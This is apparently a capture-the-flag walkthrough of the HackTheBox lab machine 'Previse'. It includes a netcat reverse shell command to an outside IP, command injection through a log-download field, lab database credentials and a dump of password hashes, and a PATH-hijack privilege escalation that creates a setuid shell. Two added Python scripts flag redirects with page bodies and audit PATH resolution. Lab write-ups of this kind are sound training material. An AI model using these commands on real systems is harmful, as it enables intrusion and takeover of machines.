PREVISE

Scanning

NMAP

➜  ~ nmap -T4 previse.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-16 12:12 EDT
Nmap scan report for previse.htb (10.10.11.104)
Host is up (0.37s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 28.71 seconds

A fast scan to find the open ports.

Enumeration

port 80

whatweb

➜  ~  sudo whatweb http://previse.htb/login.php
http://previse.htb/login.php [200 OK] Apache[2.4.29], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.11.104], Meta-Author[m4lwhere], PasswordField[password], Script, Title[Previse Login]

gobuster

➜  ~ gobuster dir -u http://previse.htb -w ~/SecLists/Discovery/Web-Content/common.txt -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://previse.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/x/SecLists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/08/16 13:17:17 Starting gobuster in directory enumeration mode
===============================================================
/.htaccess            (Status: 403) [Size: 276]
/.hta                 (Status: 403) [Size: 276]
/.htpasswd            (Status: 403) [Size: 276]
/.htaccess.php        (Status: 403) [Size: 276]
/.hta.php             (Status: 403) [Size: 276]
/.htpasswd.php        (Status: 403) [Size: 276]
/accounts.php         (Status: 302) [Size: 3994] [--> login.php]
/config.php           (Status: 200) [Size: 0]                   
/css                  (Status: 301) [Size: 308] [--> http://previse.htb/css/]
/download.php         (Status: 302) [Size: 0] [--> login.php]                
/favicon.ico          (Status: 200) [Size: 15406]                            
/files.php            (Status: 302) [Size: 8395] [--> login.php]             
/footer.php           (Status: 200) [Size: 217]                              
/header.php           (Status: 200) [Size: 980]                              
/index.php            (Status: 302) [Size: 2801] [--> login.php]             
/index.php            (Status: 302) [Size: 2801] [--> login.php]             
/js                   (Status: 301) [Size: 307] [--> http://previse.htb/js/] 
/login.php            (Status: 200) [Size: 2224]                             
/logout.php           (Status: 302) [Size: 0] [--> login.php]                
/logs.php             (Status: 302) [Size: 0] [--> login.php]                
/nav.php              (Status: 200) [Size: 1248]                             
/server-status        (Status: 403) [Size: 276]                              
/status.php           (Status: 302) [Size: 2971] [--> login.php]             

===============================================================
2021/08/16 13:21:31 Finished
===============================================================
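
Several of the 302 results above redirect to login.php yet still carry a body of a few kilobytes, which means the page was rendered before the redirect was sent; the fix on the application side is to stop execution right after the Location header is emitted. The following added example (not part of the original write-up) parses gobuster result lines and lists such redirects; the `STUB_MAX` threshold and the function names are assumptions.

```python
import re

# A subset of the gobuster result lines shown above.
SAMPLE = """\
/accounts.php         (Status: 302) [Size: 3994] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/css                  (Status: 301) [Size: 308] [--> http://previse.htb/css/]
/download.php         (Status: 302) [Size: 0] [--> login.php]
/files.php            (Status: 302) [Size: 8395] [--> login.php]
/index.php            (Status: 302) [Size: 2801] [--> login.php]
/login.php            (Status: 200) [Size: 2224]
/logs.php             (Status: 302) [Size: 0] [--> login.php]
/status.php           (Status: 302) [Size: 2971] [--> login.php]
"""

LINE_RE = re.compile(
    r"^(?P<path>\S+)\s+\(Status: (?P<status>\d{3})\) \[Size: (?P<size>\d+)\]"
    r"(?: \[--> (?P<location>[^\]]+)\])?"
)

# Assumption: a stock web-server redirect stub is a few hundred bytes
# (308 for /css above), so anything larger is application output.
STUB_MAX = 512


def parse(text):
    """Turn gobuster result lines into dicts; banner lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            rows.append({
                "path": m["path"],
                "status": int(m["status"]),
                "size": int(m["size"]),
                "location": m["location"],
            })
    return rows


def redirects_with_body(rows, stub_max=STUB_MAX):
    """Return 3xx results whose body is too large to be a redirect stub."""
    return [r for r in rows
            if 300 <= r["status"] < 400 and r["size"] > stub_max]


if __name__ == "__main__":
    for r in redirects_with_body(parse(SAMPLE)):
        print(f'{r["path"]}: {r["status"]} -> {r["location"]}, {r["size"]} body bytes')
```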

When we intercept the packet, we need to change the status code. Let’s do this for.

And click Forward

Let’s enter the site with a small change.

Now let’s press Forward.

Yes, now let’s create a user and check out the site.

There is a file here. Download it and check it out.

MySQL information

Exploit

Select log data from here.

I will try to get myself a reverse shell from here.

Command: nc -e /bin/sh 10.10.16.17 1234

add and encode ...

python -c 'import pty;pty.spawn("/bin/bash")'

From the backup we downloaded, open the config.php file.

Credentials: root:mySQL_p@ssw0rd!:) for the previse DB

www-data@previse:/var/www/html$ mysql -u root -p
Enter password: mySQL_p@ssw0rd!:)
mysql> show databases;
show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| previse            |
| sys                |
+--------------------+

mysql> use previse;
mysql> show tables;
+-------------------+
| Tables_in_previse |
+-------------------+
| accounts          |
| files             |
+-------------------+

mysql> select * from accounts;
+----+-------------+------------------------------------+---------------------+
| id | username    | password                           | created_at          |
+----+-------------+------------------------------------+---------------------+
|  1 | m4lwhere    | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
|  2 | userr       | $1$🧂llol$XqhFt5KI.KI/bVVL8EfOe0 | 2021-08-16 12:58:24 |
|  3 | kibouo      | $1$🧂llol$T5FnvDN5sWXa6Eyh1tbUW. | 2021-08-16 13:01:44 |
|  4 | javelin     | $1$🧂llol$6lhphbLFAgKFSGAuFY76l1 | 2021-08-16 13:06:24 |
|  5 | unclebill   | $1$🧂llol$CjeIHiaoyZqRadtFHRc4W/ | 2021-08-16 13:12:03 |
|  6 | Giorgi      | $1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1 | 2021-08-16 13:37:57 |
|  7 | demouser    | $1$🧂llol$wzYjWk/p5usz8BzxvPrXs1 | 2021-08-16 14:17:32 |
|  8 | asdfg       | $1$🧂llol$n3EuPeTN2PYbg2K57TRhn1 | 2021-08-16 15:02:17 |
|  9 | vector      | $1$🧂llol$V/xv0wMqNEVaOf.LoAuZB1 | 2021-08-16 15:11:19 |
| 10 | loller      | $1$🧂llol$6Os6x8QhVyFg6Bm3Pwq/L0 | 2021-08-16 15:48:12 |
| 11 | ericsonsito | $1$🧂llol$oXlR8DTdeOZRd4X9sEOAE0 | 2021-08-16 16:08:19 |
| 12 | xdann1      | $1$🧂llol$3RRrRSP1eU1VYCn0WJj8p0 | 2021-08-16 16:12:12 |
| 13 | b1sh0p      | $1$🧂llol$C01fgIC5dqKV/r53IgKr11 | 2021-08-16 17:12:52 |
| 14 | admin       | $1$🧂llol$uXqzPW6SXUONt.AIOBqLy. | 2021-08-16 17:17:34 |
| 15 | skiddy      | $1$🧂llol$eBQMPwAvz9j9ZpK62qDI// | 2021-08-16 17:23:31 |
| 16 | ayman       | $1$🧂llol$k86J15RFrQV35C.YluXi30 | 2021-08-16 17:40:38 |
| 17 | newguy      | $1$🧂llol$Z94NSX5l4okWmemOfhGQ30 | 2021-08-16 17:41:22 |
| 18 | adilop      | $1$🧂llol$6HoyCpVc.ZwWioSMmBO1C1 | 2021-08-16 17:45:59 |
| 19 | newuser     | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2021-08-16 17:46:19 |
| 20 | random1234  | $1$🧂llol$79cV9c1FNnnr7LcfPFlqQ0 | 2021-08-16 18:01:37 |
+----+-------------+------------------------------------+---------------------+

After cracking ...

Credential m4lwhere:ilovecody112235!

Privilege Escalation

Check sudo rights.

We can run access_backup.sh as root.

This script triggers gzip, so let's override it with our own gzip and export PATH.

m4lwhere@previse: echo '#!/bin/bash
    cp /bin/bash /tmp/c
    chmod u+s /tmp/c' > gzip;

m4lwhere@previse: chmod +x gzip;

m4lwhere@previse: export PATH=/tmp:$PATH;

m4lwhere@previse: sudo /opt/scripts/access_backup.sh;

m4lwhere@previse: ./c -p

c-4 ~# cat /root/root.txt
*******************
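
The escalation above works because gzip is looked up through a PATH the caller controls; calling it by absolute path in the script, or having sudo reset PATH (`env_reset` with `secure_path` in sudoers), closes it. The following added example (not part of the original write-up) walks a PATH in order and reports which file a command name resolves to and which searched directories are world-writable or owned by an untrusted uid. The function names and the two temporary directories standing in for /bin and /tmp are constructed for the demo.

```python
import os
import stat
import tempfile


def audit_resolution(command, path, trusted_uids=(0,)):
    """Walk PATH in order as a shell would; return (resolved_file, risky_dirs).

    risky_dirs lists every directory searched up to and including the hit
    that is world-writable or owned by a uid outside trusted_uids.
    """
    risky = []
    for d in path.split(os.pathsep):
        d = d or "."  # an empty PATH entry means the current directory
        try:
            st = os.stat(d)
        except OSError:
            continue  # missing directories are skipped
        if st.st_mode & stat.S_IWOTH or st.st_uid not in trusted_uids:
            risky.append(d)
        candidate = os.path.join(d, command)
        if os.path.isfile(candidate) and os.stat(candidate).st_mode & 0o111:
            return candidate, risky
    return None, risky


def demo():
    """Constructed scenario: a world-writable directory ahead of the system
    directory in PATH, both holding an executable named gzip."""
    with tempfile.TemporaryDirectory() as sysdir, tempfile.TemporaryDirectory() as drop:
        os.chmod(sysdir, 0o755)  # stands in for /bin
        os.chmod(drop, 0o777)    # stands in for /tmp
        for d in (sysdir, drop):
            target = os.path.join(d, "gzip")
            with open(target, "w") as f:
                f.write("#!/bin/sh\nexit 0\n")  # harmless stand-in
            os.chmod(target, 0o755)
        trusted = (0, os.getuid())  # the demo cannot create root-owned dirs
        inherited = audit_resolution("gzip", drop + os.pathsep + sysdir, trusted)
        pinned = audit_resolution("gzip", sysdir, trusted)
        return {"drop": drop, "sysdir": sysdir,
                "inherited": inherited, "pinned": pinned}


if __name__ == "__main__":
    result = demo()
    print("caller-controlled PATH:", result["inherited"])
    print("pinned PATH:           ", result["pinned"])
```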
